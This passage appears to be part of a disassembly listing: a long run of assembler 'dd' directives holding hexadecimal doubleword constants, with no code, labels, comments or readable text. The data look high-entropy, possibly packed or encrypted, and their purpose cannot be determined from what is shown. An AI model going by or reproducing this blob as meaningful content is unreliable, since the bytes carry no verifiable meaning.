dd 4462FFA4h, 5FE07F31h, 7F5F7BCAh, 0C9F56BBFh, 41D15E3h
dd 99D47F7Fh, 0FD25469Ah, 4F8C7F63h, 4F434BFh, 8FF252E9h
dd 85A4173Fh, 0BF979BDBh, 3FFD89CCh, 0EAA06F72h, 0BF47E0EAh
dd 0E5E82BFCh, 3F46D972h, 0C9AF7F18h, 5F081A7h, 0D650278h
dd 0C305D7FFh, 99187FFFh, 18183F3Fh, 2178BCE9h, 0F839193Fh
dd 9F019D9Ch, 0F089AC3Fh, 2ACCA784h, 925FBFBFh, 0FFF614B9h
dd 0D760A3ECh, 0C2080C1Ah, 5C0F6B7h, 0ABA5DDF2h, 0A1F8833Fh
dd 99D75804h, 72F4BF25h, 288AA1F5h, 72BFC6F7h, 7F06FF2Fh
dd 3F38D334h, 7FA53F46h, 0AFA1F6F6h, 7C7FC68Bh, 0B0E7C805h
dd 0F8CE7F08h, 57A4FF0Fh, 7F1DB47Fh, 9C69ECB2h, 4603F4Fh
dd 4A9EBFC9h, 0CE971728h, 32BF06D7h, 0D30C0CDEh, 0C9EB7838h
dd 0C097F14Eh, 0BF1B6842h, 7FC48510h, 200380FEh, 0C2DCB552h
dd 0FF1D7F2Eh, 398EFCF4h, 71D255D8h, 0C0317F2Eh, 4D79AC5Dh
dd 0FF1BF13Fh, 53C6C18Bh, 0FF817F20h, 3331FF96h, 0CE26BF7Fh
dd 3F4DB7F4h, 293C204Fh, 6136BF3Dh, 8C11C0FFh, 169ECAFFh
dd 6B3F0B84h, 6E18BFF8h, 2DDFFF9Fh, 0D04F4AE0h, 2CA87FC6h
dd 6EB7FF3Fh, 224DEB6h, 1F3FA4ABh, 4E39DB95h, 0C57F6FA5h
dd 7FD1B8EBh, 47BFBE0Eh, 1F5C371h, 3314F0FFh, 0D8C63FBFh
dd 0C2E3042Eh, 35BF0952h, 7FFFE3C4h, 0FFFFE9A2h, 0AA583FCBh
dd 9E7C79FCh, 6EE442EEh, 2D1B5EBFh, 71CEE97Fh, 3B74FF25h
dd 5C7F3DC4h, 52443F07h, 76D7F8Ch, 613FA1BFh, 1B183F29h
dd 0ACF03F31h, 4EE5BA24h, 0FE7F25BFh, 0C4778DC7h, 84CCC6DCh
dd 7FE0C53Fh, 8B7DFFC6h, 6B0277Fh, 80B9B3FEh, 5C15396Bh
dd 13F8FFA6h, 7736D681h, 7FC6BF46h, 0C2A9D0FDh, 3F46FD8Ah
dd 0BFFF8906h, 0A1015F12h
dd 0DFD56738h, 233F979Ch, 0A26BD7F0h, 8B7FBF11h, 6B4412D3h
dd 92C07F43h, 15897FDFh, 0C0CF5086h, 3F8C4E3Bh, 18FFEB0Fh
dd 4B3F9D29h, 0F8DBCFFh, 0BBF0F1B2h, 0FEB8CC1Dh, 0A25A047Fh
dd 9C7FB1C3h, 0AD3F1BDEh, 1F3F0A89h, 256A286Ch, 4380AD91h
dd 3F2CFF61h, 0A0F31B27h, 3FA969D2h, 0CDF72DFFh, 0FB77E6Dh
dd 84BBBF4Bh, 4D64FFF4h, 0B920F21Fh, 8E3CDB78h, 5FA9B03Fh
dd 0CA0BC5FFh, 0A56D55FBh, 35665150h, 0FD56DAAh, 0B78300D7h
dd 0DA7C1064h, 63874440h, 0B6055A9h, 385FCCC4h, 0BA1E8AF9h
dd 31AACE71h, 0BA21113Dh, 84055EC0h, 249B8871h, 0E514D09h
dd 0B4568040h, 0AEFB7C0Fh, 0E59744C0h, 3A8FAA02h, 11C661FCh
dd 5546C967h, 3CEDC349h, 0D36D2EDAh, 9FB5423h, 0E27B7755h
dd 0B94B8EFAh, 268C8015h, 0AD815078h, 0A85834C4h, 0C682B4F5h
dd 58CC9310h, 8A975850h, 5F749532h, 36B30253h, 183BC4BDh
dd 3FAC0AC2h, 0BA06023h, 428B277Ah, 0A784E6A8h, 3DE94944h
dd 551EC147h, 4013B983h, 53D05760h, 21206548h, 2BF5079Bh
dd 5405D2BCh, 35A0789Eh, 2660F54Fh, 785208D1h, 0CA24D413h
dd 0C330DB9Dh, 0BEBA009h, 0E00658C2h, 39012289h, 0FA1289BEh
dd 58E0F2F7h, 0E886DC04h, 8F54831Ch, 0B3B6B909h, 0A7A9BAF4h
dd 0C0C602BBh, 0BCD010EEh, 0F4CF01BCh, 5D2ADBD5h, 0B2D015A9h
dd 4A0248BFh, 92945CA0h, 7D090191h, 430F2B6Dh, 3E3775C7h
dd 0C7E03D7h, 7A469AC0h, 0F5F6C14Eh, 4788554Ah, 0A81DFDA3h
dd 0B90ABE59h, 0C90019F5h, 12888C17h, 4102FA98h, 13476CE9h
dd 276C9D3Ch, 0D3C0D02Ch, 21160267h, 289026CFh, 951ED146h
dd 0FB2044F9h, 0D34AAEBFh, 2D265901h, 4CCCE31Ch, 0BFE25196h
dd 311B8F8Ch, 8D32E233h, 0C8D1DCB7h, 0B38D335Fh, 40EC47D8h
dd 620E2686h, 0ED758C1Ah, 6FD5031Ah, 28D846CFh, 0E91A0A24h
dd 7D6340A8h, 0F0C19A31h, 0F000F588h, 70BD14F0h, 454CD32h
dd 4024E1C8h, 0CD0A4B18h, 89CDB95h, 497B704Ch, 0AD1D8875h
dd 13EC26E3h, 6A1FE357h, 36E423DBh, 1D7BF211h, 10123012h
dd 182D6021h, 0BE55DFEDh, 0C39C8B04h, 0DC01358h, 2C71D302h
dd 0D4559253h, 303CA06h, 262C55E0h, 7D74B405h, 2ABB544Ch
dd 0E120309Dh, 317D63CBh, 0F0000079h, 64056B9Ah, 80618F4Eh
dd 0AD8624h, 0BA20BA07h, 80C7CD23h, 1B8C53BEh, 8087B1ECh
dd 0ED8C2084h, 0F891C6ECh, 287F1D3h, 963C349h, 0D2B464BEh
dd 0B907A68Bh, 3E8BE080h, 4080C006h, 6C4C45BDh, 5DAA23C1h
dd 9EDC7F25h, 94FAC39Eh, 3CCEA8E2h, 7A03DC8Eh, 0CD952606h
dd 83324B70h, 7E763B58h, 5C617DECh, 0C908B472h, 2B7D14FDh
dd 0FD05D4DBh, 90281A83h, 0E87D72BDh, 1A52080Bh, 0CC255C17h
dd 0F230D415h, 33D8631Ah, 2389EA06h, 89BED681h, 0F3F7721Bh
dd 59D058E5h, 1887105Bh, 1434C608h, 64793B5Bh, 41C87B0Bh
dd 0BB189F78h, 5BAC1E41h, 2E0010E6h, 304E1D4Fh, 1C7DECCDh
dd 0F4C500F0h, 0E4877763h, 30C108DBh, 5695F4E0h, 0D3633D03h
dd 996F16C0h, 0C92BDD11h, 0C960E405h, 1D20B5E4h, 0E42175E0h
dd 0C997C10Dh, 5F303388h, 64ECFEC9h, 6A0631FFh, 7FCDA989h
dd 989970Fh, 0F1B9F7EFh, 1C9BF58h, 8B4B2559h, 858443FFh
dd 820D171Bh, 23F0FDA3h, 894D2E7Eh, 0FF9B2F5Bh, 10C15C7h
dd 26635F18h, 0E12DDAFFh, 26D85382h, 365FFF45h, 4963EE01h
dd 0F9FF269Bh, 0C0104DA7h, 0FFA6C6D2h, 752DF61Dh, 76587337h
dd 0FF25BFFh, 766865B4h, 964FFF5Ah, 0DE4C2D7Bh, 0CFF05A2h
dd 72F856B3h, 0FEE8332Eh, 14454AB0h, 0DF529301h, 0ACA0523Fh
dd 5E3DFF62h, 36E3942Eh, 84FF4AD7h, 962E0FB3h, 0FFB3F914h
dd 1E9D9B30h, 7681ED70h, 585A6DFFh, 96CB4F79h, 8C44FF84h
dd 0F5776DBDh, 2CFF0C17h, 9C86069Dh, 0FF8EC710h, 86BF2517h
dd 6D7EC38h, 3D2E92FFh, 0C3AC7C14h, 262FFF6Fh, 0BD7A144h
dd 650233ECh, 8722E5F6h, 417EFF7Fh, 2BEAB4F0h, 4392FD17h
dd 598119A2h, 258D3F8Fh, 9161FEA2h, 7F1FF63Bh, 2F7FD525h
dd 892D7232h, 0ECADBF6Eh, 0F57F6E43h, 0AEE64F1Dh, 69C5EC2Eh
dd 3FF46D51h, 43B175F9h, 1AFF9C8Ch, 786D587Bh, 0DBC993A7h
dd 0F1BF4BDFh, 49B0D0F6h, 614E3FFBh, 0D7FE6E7h, 0B068B9FFh
dd 724CF1B2h, 0D1DB64FFh, 3D7F070Ch, 9F2EECF6h, 7F97BF47h
dd 0B2FEF1ADh, 0E26AB308h, 3F170EA3h, 9BFE44F9h, 18D7E3C6h
dd 0BFDF857Bh, 0C2AC7EE7h, 3CC3C5FEh, 160653A8h, 0D0927FDFh
dd 1E6E2D0Fh, 3FCFC00Fh, 9A2EA95Fh, 0FB3285DEh, 0BE5B4FC9h
dd 5D7E7F24h, 171EF64Ch, 35E17F17h, 3B884DFFh, 6892B20Fh
dd 0AD050AD7h, 0C33BF610h, 0F97F2661h, 9239FC3Dh, 48C4333Fh
dd 9C0EFF58h, 1F9D6A22h, 7BFF4CD8h, 8D439577h, 0A5B406BEh
dd 7F0BCACBh, 7B4AF84Ch, 47B41A2Eh, 0D1A72F3Fh, 0F6BF2617h
dd 116DE09h, 0E8A8E094h, 0FF32D699h, 2E5BA5FCh, 0BF2E4893h
dd 2E4C6B57h, 17A4C63Fh, 0FFF52EBFh, 88596D63h, 0E9966644h
dd 0F05A4FFCh, 0BF858343h, 6AB4081Ah, 8A3F6EDAh, 1579DB3Bh
dd 14A7FFFh, 3C2EF717h, 0C34BE7F8h, 0EE97808Eh, 0D7C2B210h
dd 0C7FF7F0Dh, 8917447Dh, 9CFF2E2Fh, 8F59C23h, 0FFB0F90Dh
dd 4C288361h, 0BE8A644Dh, 0F1BF6485h, 9067433Dh, 0D2EA3FBFh
dd 0FF7C22F0h, 659664F9h, 33C5A6E5h, 6F71EE85h, 62C34A2Eh
dd 4BDBF6FEh, 7D6308DAh, 0DC750D16h, 0BBBEE43Fh, 7FBFC1A8h
dd 0B147314h, 0DB849117h, 7E1A3C3Fh, 0C5DF7F30h, 0C6B212CCh
dd 3FB114DDh, 18FF6360h, 7FB2E3DBh, 0B721FCB1h, 0A0D94BC1h
dd 0B149BF23h, 0FC2BF2Ah, 2D3F3FE9h, 25846113h, 541AABFEh
dd 59588AC9h, 588286D8h, 0BF5F97FFh, 0B20CD2C1h, 7D2347FEh
dd 2AB10F2Ch, 37257FDAh, 0B70845A8h, 0CF26BFF8h, 0FB6CCD3Bh
dd 0D2D2BCBFh, 639DECB9h, 317FBF67h, 595B8AE9h, 9159F876h
dd 4F2C8537h, 2782DBFFh, 8405276Dh, 31E53FA5h, 7F88ADDBh
dd 3FDF853Bh, 7F9A50C6h, 0BFB082EDh, 9D3F0A85h, 0CE3F271Dh
dd 30C2BF18h, 93697B7Fh, 0C374A47Fh, 523C6D3Fh, 0CE3DFFFh
dd 7BFBED7Fh, 21A2CF62h, 4EC0713Fh, 72BFBFE1h, 3F698426h
dd 3DD82EBBh, 9CEF703Fh, 747F7A2Bh, 3FB9CE89h, 6F1C36B9h
dd 0E6FF2D35h, 85ED7F23h, 49F3FF57h, 4B574808h, 38961A67h
dd 9C3FDC23h, 0C25187D0h, 0FDBF0B1Dh, 0FE721DDDh, 0A3FBB62h
dd 5164BF0Fh, 82C5D97Eh, 0FFC460B1h, 98FFBF64h, 0C1060C45h
dd 2CFBFEDEh, 56E7787Bh, 0B4C97D38h, 7F38C9CAh, 63FF7FF7h
dd 34BFA6E2h, 0D920FF8Eh, 40A93F93h, 0BE8363E4h, 8748E271h
dd 0F78DE2FFh, 3B0DE1EAh, 3FC67FACh, 78585B3Dh, 0E09F3FB8h
dd 2DFF3F49h, 48B67149h, 6F1608ADh, 4B464AFFh, 0FF26C2C2h
dd 0FFD6A0EFh, 0B0B709E9h, 0F9B8BD7Fh, 0BF2786B2h, 0FF53B2DBh
dd 0BB685974h, 0BF2BF93Fh, 0FFAF1476h, 3D7F71C2h, 8B23B54Ah
dd 0FF47FFFh, 6FBF9AABh, 82542E3Fh, 21A1F4CFh, 0A26EA2C6h
dd 0FF11901Eh, 66C056B7h, 7FF985BEh, 73B043CDh, 0ED21F8CFh
dd 3FB014D7h, 0A107BF37h, 516FFF6Fh, 0DB2BC051h, 18B8011h
dd 6EC83FFh, 240C010Fh, 41310601h, 5858661Fh, 40FD4600h
dd 59306A5Fh, 44FF4600h, 190B644Fh, 41204600h, 0B2890F1Fh
dd 4A5E55h, 1F8271A4h, 0F0E6838h, 3E6285F8h, 92020000h
dd 80F10A78h, 0B8269DE9h, 72D10E24h, 3709659h, 0EBE859F6h
dd 81E3923Ah, 0A8A063Bh
dd 0F776FA30h, 28583A00h, 3E64047Eh, 3F49A0AEh, 6E0E420Fh
dd 698A37h, 0F4EEE38Ch, 5EEE14Fh, 66BF5108h, 0D306508Bh
dd 10056CC2h, 0F714C924h, 76008005h, 6CC358CBh, 48011805h
dd 2B7855F7h, 0F69202DAh, 0BA0FFE82h, 8FF707FBh, 24CAB1FEh
dd 0CA219180h, 2D3BF505h, 4DBAD853h, 7011EB30h, 0C110B803h
dd 13C575F2h, 0F789EBC6h, 0E4BD3506h, 0C8854B02h, 47FCF707h
dd 93104AC1h, 0B6021B2Bh, 4204BFDBh, 10C0088h, 222FB11h
dd 6CA323DDh, 81A301ACh, 13680ED5h, 28D4EC16h, 97610EC2h
dd 0DCCD3E00h, 0CB8C08ABh, 1004E92Eh, 3838F69Bh, 0EF5D4149h
dd 40748BC9h, 0E5BA7C2h, 8751FD70h, 3CB08947h, 0FB8DE463h
dd 3CABAC99h, 41D99F83h, 0DD347589h, 0EDE54CA1h, 0C6806A65h
dd 0D7B2313Bh, 7E6CABC6h, 362BE30h, 9C29D794h, 1C09017Ah
dd 2C80522Fh, 5854CD04h, 0B0AD81F2h, 82931930h, 9E3B676Ah
dd 0F622E15h, 0EAF89068h, 1B3C2CACh, 350D3870h, 9FC1428Fh
dd 0A864E196h, 0AE3A037Dh, 80D448ECh, 2C41D29h, 53C6127h
dd 8713F522h, 0D2AB65A9h, 158B1C62h, 47C09220h, 9B4BD202h
dd 0ED4DDFEDh, 29454EFEh, 41D727D3h, 996FEFC0h, 0E0CEB911h
dd 0C2000005h, 0BB33D33Fh, 4F7F658Ch, 9151629h, 18216257h
dd 8680B003h, 10B424DBh, 0B7C6D208h, 15384C8Ah, 0FDACC325h
dd 0A1935410h, 0FE87F656h, 0C115C18Bh, 0EA265688h, 0CB2CB47Fh
dd 61492C38h, 6C4649B2h, 5CF19153h, 845FEAA2h, 99024415h
dd 23E2F812h, 6EA6C982h, 0C302926h, 6723773Bh, 8182D6BAh
dd 1C9CA81Dh, 800D01EDh, 168AD65Dh, 2A1E44C0h, 49F0CF2h
dd 0C3C4E05h, 221590E5h, 4B823DFh, 7603EC2Fh, 0D96C1956h
dd 9309A11h, 0E8FB9286h, 591B1292h, 0C977261Ch, 6CEB9209h
dd 83F76756h, 2C00C26Dh, 0F8B542EBh, 0C6D2D332h, 0A31F9728h
dd 63176E5Dh, 7C053C36h, 7E12682Ah, 0BB268B4Bh, 7CB79300h
dd 403C1723h, 40480460h, 0AFB42248h, 0CC552750h, 35CC0B6Eh
dd 9BBD03DCh, 3F7D12BBh, 0A1F332F7h, 611266D3h, 1D3D4B21h
dd 48254960h, 1FB68EA4h, 7E9027F6h, 9EF3F604h, 4D4C7436h
dd 23DD549h, 7D11EB1h, 378B9B27h, 9C96C26h, 0E1415DB3h
dd 88BC7ACAh, 1E1FE30Eh, 2043688h, 594748B0h, 79186322h
dd 98E05621h, 59BB44A2h, 81503D88h, 62C40985h, 4910EA91h
dd 57C0BE1Fh, 0AFECD033h, 71490F2Ah, 0E3E2FDE2h, 559C6DDCh
dd 762E0D14h, 3545663h, 580F615Ah, 0D38715C6h, 9090B02Fh
dd 0E77E0E9h, 123FC760h, 0D709140Dh, 9F5B8020h, 64403B8h
dd 0C003FAC3h, 4730EA77h, 88218314h, 8B0917B3h, 0C83BC0A8h
dd 4647249Eh, 87125286h, 46EFD221h, 97D8204h, 0C152418h
dd 0B303DC1Bh, 76205040h, 3785F61h, 0B61B6A03h, 48101FF9h
dd 520076CBh, 6445DD4Ch, 4709BE15h, 42446481h, 1615F0DFh
dd 0A82050D6h, 1A84FF31h, 7D7B6FC2h, 0B8D38C86h, 307E2112h
dd 0BF0F3D86h, 83799F6h, 1F499BEDh, 49E35AE9h, 0CBF026F2h
dd 30FF064Bh, 1D4F2749h, 2C321601h, 33CF1B3Ch, 0E792307Bh
dd 0AA911C2Bh, 4C8E3301h, 0F4C16FF8h, 0D8CCC8A0h, 8196350Dh
dd 303EDDA3h, 37406F2Fh, 8752F9Dh, 0A80A0B9Ah, 8C110705h
dd 5FB828E8h, 0E329E7CAh, 0E805E0C1h, 406A0720h, 6054E918h
dd 94A6F1AAh, 245053ECh, 5451C805h, 1D54FF3Eh, 11038403h
dd 1EBDB09Dh, 61A50284h, 87D3F2D4h, 4764F5BDh, 4C020CC2h
dd 6C32190Dh, 0FB61893h, 42D2EC46h, 5F7696CEh, 0F00DD1F8h
dd 65045Bh, 0D31D5858h, 8DF63909h, 7816763Dh, 0C4204421h
dd 0C83827F2h, 14A92880h, 3163E2Dh, 11F6240Eh, 7DE4498Eh
dd 3DBD9F08h, 84848058h, 701FB7B4h, 90017E8Dh, 0E20168Eh
dd 54910806h, 65EF0022h, 2E7Fh, 5FFF0604h, 6ED19302h, 2864803h
dd 307C44A7h, 70191526h, 9E0792Bh, 56834180h, 0BB111DC8h
dd 234ECE08h, 6D4F4118h, 30A992E5h, 3D40D25h, 0FA8520A6h
dd 0F78BD08Bh, 0CFE0FB30h, 7BCC492Ah, 0C5EC6556h, 0B0B30EFDh
dd 556E5075h, 15C99EAAh, 6C3522B2h, 7C1B1FE4h, 84CB0667h
dd 0CF4B0EADh, 0FE5B521Ch, 3E8046h, 0F546FA75h, 6B914BC8h
dd 36AC28BCh, 2F25D92Eh, 2B76B1F2h, 1A51BD84h, 0FCF51089h
dd 35EAB203h, 2A685940h, 52D8000Fh, 30D810E1h, 0D71362Ah
dd 0E4746B32h, 2792D3Ch, 0F6762C95h, 4CAFA44Bh, 350E2778h
dd 200FCC1h, 9ECE0D4Ch, 2AF2F423h, 2FEC0BB0h, 0A1C3FB23h
dd 29263634h, 34E0A3B0h, 1A6AAA10h, 12D8D312h, 0DB203537h
dd 0F033380Ah, 468B184Ch, 0C4032E50h, 1AB3013Ch, 0E03390B9h
dd 0CF5D8002h, 0AB9AA04Dh, 28B23E49h, 4B8F6109h, 19A1B126h
dd 0C5744905h, 172242DFh, 2BF5D102h, 522EF92Dh, 0FE24E0C1h
dd 8977B07Ah, 644B1014h, 0FD1BE99h, 0F808DFD5h, 14EDB94Ah
dd 8703304Fh, 601E6B0Dh, 5A884313h, 0D908864Ch, 2A3A19E0h
dd 65EEA9DEh, 6B120A4Dh, 0DFDDF4E3h, 7B0902CDh, 0BFA588F7h
dd 5738C5BAh, 1EDA8113h, 0ACA31672h, 0B21DB50Ah, 8D84C12Bh
dd 91D710A9h, 56F4396Dh, 8A1F4187h, 0C6DB830Eh, 0A8EC2C05h
dd 3C2F6DCh, 0BB1128C4h, 0B87EF193h, 0ED9A9E1h, 6C4F125Eh
dd 0F7BE6CA5h, 0CFF83F87h, 90972886h, 724D728Fh, 453B77Ch
dd 0AA835AA0h, 1E270629h, 902A873Eh, 715E6EA9h, 945051D5h
dd 5652575Fh, 0FF1F445Eh, 5F560075h, 97E84F55h, 1577425Ah
dd 95E1558h, 5F204578h, 28C1D7h, 71D91800h, 0D321937Ah
dd 71D90964h, 482CF138h, 0D244909Ch, 220C6D90h, 40D22B3Ch
dd 0B0802464h, 0C11A1784h, 89C054CDh, 644F498Ah, 0BD08C23Fh
dd 1556DF1Ch, 80C1F64Fh, 0ABBF6A6Eh, 848716C6h, 12DD18CEh
dd 8126C738h, 4266B039h, 3D82755h, 64296EEDh, 0EB95DE0Eh
dd 70962B17h, 5625757Fh, 498242D1h, 5FCC840Ah, 4452864Fh
dd 391913DDh, 820F10FEh, 17Eh, 189D1082h, 0A026494Eh, 87542CD9h
dd 0E448BD1Dh, 8354C671h, 0C8658AAAh, 727043ACh, 0E652879Dh
dd 6FD93D64h, 4C0F3209h, 0C430207Ch, 4F14162Ch, 0F803CA8Bh
dd 498B3C4Ah, 9E975050h, 87B2931h, 0B5C0D6B2h, 14D877B6h
dd 0C6827C51h, 3DCF8136h, 0D41689C2h, 4EB65538h, 80900AEAh
dd 34748D1Ah, 0AD2AF819h, 0DD87B29Eh, 0B1C28518h, 0FF51C76Fh
dd 73730839h, 1890E8Bh, 1240E9DCh, 84870BEh, 666F7DC9h
dd 7C9BCC7Dh, 931182F1h, 0D4C0B954h, 2D815901h, 0AD04EE0Eh
dd 508475A7h, 0FBFDB8F3h, 1B22248Eh, 0CC3DB163h, 8226B80Fh
dd 0D0288D0Dh, 27562322h, 0DC38804Eh, 56718416h, 197BBAFFh
dd 0C916978Bh, 0A4B2465Eh, 6C8A1698h, 0CB6398BEh, 0FB2CD85Eh
dd 0ED82C911h, 0EE625BD7h, 79D37FB6h, 6321D540h, 0C9214430h
dd 124AE270h, 4D05EBB4h, 1E6D0D01h, 71C007E2h, 0F1B82502h
dd 726692Dh, 38384424h, 15B94C00h, 3FB45E3Eh, 5038D17h
dd 0C1EBA0F0h, 1F3142F1h, 3A05203h, 26076847h, 830F8449h
dd 0FE9DC428h, 4A7C42h, 59AED5Fh, 777C683h, 9801A73h, 1D412262h
dd 3BA8946h, 0D148C7A9h, 4F1B7E2h, 3FB87FBDh, 0D4BA0110h
dd 0F6B29350h, 0F2E815C4h, 4926512Bh, 45105A2Ch, 362E6661h
dd 0E91FEAAEh, 27FEB1E7h, 8938AE08h, 3596879h, 4D12504Eh
dd 95C8048h, 5811E46Bh, 383BE10Ch, 0C0526DFh, 0B9281B19h
dd 1A9DE0ECh, 14E1FB75h, 9F200CB7h, 90C90FE2h
dd 1F47C6D6h, 539A549h, 0E317C85Bh, 4F4E386Ah, 6A92EF38h
dd 0E2364FAh, 74466811h, 0AFE839BAh, 0EA6D0F05h, 7DDCD6A0h
dd 5C497C82h, 33B945BEh, 5070AC02h, 28C92798h, 3A5A3EACh
dd 446E045Eh, 25619306h, 7C76E9E3h, 2CA9h, 0F0057264h
dd 44F3F7E9h, 94D9F176h, 2E94A6A3h, 3BA07936h, 10E56A26h
dd 37C0309h, 4B066EE8h, 0D0ECF2F1h, 0D4F0FD63h, 0DF70BA02h
dd 37A19C49h, 2D020DA7h, 0EE6A96ECh, 63ED5884h, 28E2B05Bh
dd 0B280FB96h, 0A6385EF7h, 0FE0FC457h, 82B73793h, 0C3878312h
dd 930B089Dh, 2485031Fh, 52070D2h, 0A40FA05Ah, 0B0366823h
dd 283E6F56h, 0D0F852B3h, 2052B8D3h, 419C87EEh, 515751C1h
dd 5647C691h, 0E8A15282h, 0E896A628h, 0C08A550Eh, 0B4C07684h
dd 0B538ED56h, 0FE03F176h, 85145F41h, 8702D5E1h, 9542A1A2h
dd 6011A64Dh, 6D9EBE26h, 0E5072F03h, 0DDBA1DB5h, 826E6405h
dd 8BC1FDB1h, 529051FBh, 4C8C0A12h, 0FB61E2Ah, 438C0A00h
dd 0D7039C2Ah, 0C2035790h, 185EB8D6h, 2A48322Ah, 7E283F8h
dd 0A844322Ah, 70844A69h, 645404D4h, 6BBB0545h, 411801D0h
dd 7967C230h, 1E9DF415h, 0AA25F1C1h, 0B9461BC4h, 0CC60E303h
dd 2450C5DFh, 335D9205h, 26BBB03Ah, 0D718DAE4h, 0E562CFC2h
dd 83BB5820h, 2B1B508Ch, 3BC6A479h, 0EC3C212Eh, 15E00521h
dd 78AB7431h, 10623841h, 0F1AAC020h, 41C2885Dh, 0F5023AF1h
dd 92003E1Ah, 8AB28A64h, 0CAC20958h, 367A7096h, 0F07C23C2h
dd 586B172Fh, 9779AF5h, 0B87BBB1Dh, 0B200BE01h, 0DD242880h
dd 878E6594h, 0D25EB1E2h, 7CA56683h, 95722603h, 0E02A3A13h
dd 6A0E13B1h, 0BD49F1C1h, 510BC88Ah, 4D9D1004h, 1EA44664h
dd 2129E50Fh, 59ADF425h, 86E3BD7h, 0A5087EC0h, 9000F038h
dd 7692E1B2h, 245F5A3Eh, 0F5B0BC1Eh, 4FB80004h, 588BCBD6h
dd 51A2FB3Ch, 382AA292h, 948B5093h, 0CF0E26B0h, 0BFC25E3Dh
dd 667938CEh, 0C38BABEDh, 0ACC3A803h, 8F8C05ECh, 0BE7D655Ah
dd 0A72CB3A9h, 345D58C5h, 425D833Fh, 313CBB16h, 0D9028D76h
dd 0A5780E4Bh, 4F0CD98Bh, 4DC01457h, 0BD77DC08h, 1B4ED1Dh
dd 0C38AF46Ch, 3718C3AAh, 3F6082Dh, 434213Eh, 0DA1F18F7h
dd 165FC166h, 0A0C11E20h, 0B17A532Ch, 0F649A584h, 381C4084h
dd 60E84B0Bh, 6018C4ADh, 0DD24D934h, 365D6DF0h, 0AB4E8942h
dd 0F010A8C3h, 0C1B0FBA2h, 14A219AAh, 889C408h, 6037EDAh
dd 0C183FFCBh, 6707D405h, 7B9E0D76h, 3E1288B1h, 0AA1F2713h
dd 0F2C1E29Fh, 34EFB000h, 0B25D0F83h, 21681145h, 5F90470Ch
dd 24C5C6CAh, 446C1607h, 0B4F00C5Fh, 51AB156Ch, 0C5446064h
dd 14F912C3h, 0AA68B01Fh, 14F64914h, 0AB5779h, 0D7B2A309h
dd 0FFF8C67Ch, 0FC2451FFh, 0C3B0F814h, 0CE24E28Ah, 0E8A28390h
dd 11EA104Fh, 25F0F52h, 0CD04F680h, 0A98B0323h, 1EF8B5CCh
dd 0C9A87865h, 1D096343h, 8C10C224h, 0ACD91878h, 852A6CABh
dd 0DC6B0DAh, 631CF799h, 377A7DDEh, 0C18958BDh, 4518C338h
dd 884B31B7h, 0DA0495B7h, 0A3B414B7h, 1C424DDAh, 78581506h
dd 32A805EDh, 0D1324092h, 0E212BEB3h, 0B43ACC1Dh, 0FEB2ED93h
dd 4F6CFBF5h, 4A3E0871h, 1BC6ED9Fh, 0F4FEC3BCh, 148BC92Bh
dd 2C6681DBh, 66483D1Fh, 91FC30Dh, 79AD6C5h, 0DFAF031Bh
dd 0CDA4A45Bh, 1006F50Fh, 0ACA28524h, 0B604948Dh, 7849E411h
dd 0EAAADDACh, 0B7DCFh, 63800425h, 802962FCh, 0DE2FC3FAh
dd 38Fh, 0FBF1D985h, 0C765AAD2h, 0EA620CA8h, 71BF0135h
dd 0AB5935D4h, 7D439822h, 9F19915Ch, 4D03B7DDh, 0B8290F7Dh
dd 8E9DEC2Bh, 5DBC0030h, 49439BA4h, 68EDDBC7h, 850FE2C2h
dd 0A99D43BCh, 0B82D3555h, 10E20A1Ch, 0DC631429h, 7913C023h
dd 26DC9038h, 9F5E86C5h, 0E63A1D24h, 0F51337C1h, 9EECA02Ch
dd 0CA50F6ECh, 8EE14DADh, 0A808CA22h, 0FB226412h, 0DE00FE80h
dd 8AB9DD62h, 516C2150h, 886604AAh, 2CC2F63Ch, 0BB2D0906h
dd 0EE24B418h, 4AA0983Ah, 81E32172h, 82A3E8F9h, 0FCD7FA61h
dd 48A0FFFFh, 0E9C40179h, 0B83B2EECh, 8A22EF00h, 0F5D8F6C2h
dd 0AB08C8C1h, 168A9140h, 2C412A2h, 88DE8A41h, 0EA838EC2h
dd 29ABD78Bh, 0B0AF205Ch, 8DAAFEE9h, 0CE030447h, 0D804172Bh
dd 814315ABh, 0BC0617A0h, 0F4C1ECC9h, 7238AA00h, 0F1ECBD10h
dd 0C3A76A0Eh, 0FDB5DBAh, 1610B35Fh, 84030767h, 0B1F7C234h
dd 0C2601EC3h, 41CBC2EAh, 0EC2BD24h, 8A030FBDh, 5D3402C3h
dd 0F487157Eh, 44E4DDA5h, 90B26284h, 39886C1Ah, 0BAAC8698h
dd 0F68BD418h, 0CB04761Eh, 161417CBh, 219780E8h, 625670EAh
dd 18B2A858h, 96166C50h, 4A26020h, 3A899D86h, 461CD614h
dd 16CD7AB2h, 2697C929h, 2880EAC0h, 98FC03F0h, 3AC0457Ch
dd 9D2EEB1Ah, 52763B6Eh, 48788F3Dh, 0E20A7072h, 19CFA866h
dd 780E530Fh, 0D00B8E2Ah, 55645BE6h, 7BD044AAh, 641B1383h
dd 0BA7F3DB0h, 0AACAB140h, 1228B967h, 8ABE0E74h, 0B0F48428h
dd 6190F6Ch, 8F8F023h, 0B60C938Bh, 39343C08h, 88EE9240h
dd 56465A1Dh, 2ED3F12h, 0C9D3A0FFh, 0F80854F5h, 0DEE9033Eh
dd 7669A9A5h, 0F5043EBCh, 12E3A76Ah, 0B0784BA7h, 59E0D275h
dd 1067C646h, 7AD6E127h, 9C9E526h, 300387A0h, 1361B22Bh
dd 0FA12DD6Ah, 68BFB7Fh, 0EE3CD08Bh, 0F97E75CCh, 0F87200Fh
dd 186EB82Ah, 402B9A51h, 50D9B16h, 21607F9Eh, 2713184h
dd 35CD12CAh, 1EEC1259h, 0CB806095h, 2DA201EBh, 4AC4108Dh
dd 3A922082h, 42A820CDh, 3B37EF1Ah, 0AA90B0FFh, 0FE7BE9ACh
dd 32FF82FFh, 0A1DA513Eh, 7210BD4Fh, 26331C9Bh, 389CA4AAh
dd 0D9C9B1DFh, 0D9623141h, 973520D5h, 9108B512h, 265D879Eh
dd 338BD501h, 0AE01F16h, 7A40B08Bh, 0EB3C57h, 2EDF9A35h
dd 66F0E480h, 0CAB6B3Dh, 60523766h, 9E83CEDh, 253C2D9Ah
dd 0A984C0D3h, 3CFC5337h, 1B096DE0h, 3CF01BFDh, 1109B370h
dd 2566927Dh, 34BB38FFh, 660E10FFh, 20097402h, 1B3FF8B0h
dd 8104F6E8h, 832EE200h, 0E057429h, 8CDD8262h, 0EE361419h
dd 0E18C2810h, 24928038h, 0D8788344h, 6E319B09h, 97699E18h
